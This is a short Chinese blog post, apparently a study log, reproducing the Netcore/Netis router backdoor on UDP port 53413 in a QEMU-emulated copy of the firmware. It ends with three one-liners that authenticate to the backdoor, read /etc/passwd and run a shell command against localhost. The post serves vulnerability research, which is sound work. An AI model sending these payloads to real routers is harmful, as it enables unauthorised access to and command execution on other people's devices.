磊科路由漏洞實例
1,背景
距離上次培訓已經差不多兩個月了,工作太慢,整個十月久沒有休過,今天總算有點時間把之前的總結一下,
2,磊科漏洞利用
參考鏈接:http://blog.knownsec.com/2015/01/a-brief-analysis-of-netcore-netis-leak-emergency/
2.1 環境搭建
前面一篇文章《學習記錄:qemu的安裝與使用》,已經搭建好QEMU,接下來就需要,通過將磊科的固件上傳,
啓動QEMU,將固件上傳:
qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net user,hostfwd=udp::53413-:53413,hostfwd=tcp::22222-:22,hostfwd=tcp::12345-:12345
如果你的虛擬機無法啓動,嘗試添加以下參數(啓動時間比較長,需要耐心等待幾分中)
qemu-system-mipsel -M malta -nographic -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net user,hostfwd=udp::53413-:53413,hostfwd=tcp::22222-:22,hostfwd=tcp::12345-:12345
得到如下結果:
進入squashes-root執行:
chroot . ./bin/sh
./bin/igdmptd
netstat -an | grep 53413
這樣後門便啓動了
2.2 漏洞驗證
直接使用知道創宇的博客進行驗證
python -c "print 'A'*8 + 'netcore\x00'" | nc -u -vv 127.0.0.1 53413
python -c "print 'AA\x00\x01AAAA/etc/passwd\x00'" | nc -u -vv 127.0.0.1 53413
python -c "print 'AA\x00\x00AAAA ls\x00'" | nc -u -vv 127.0.0.1 53413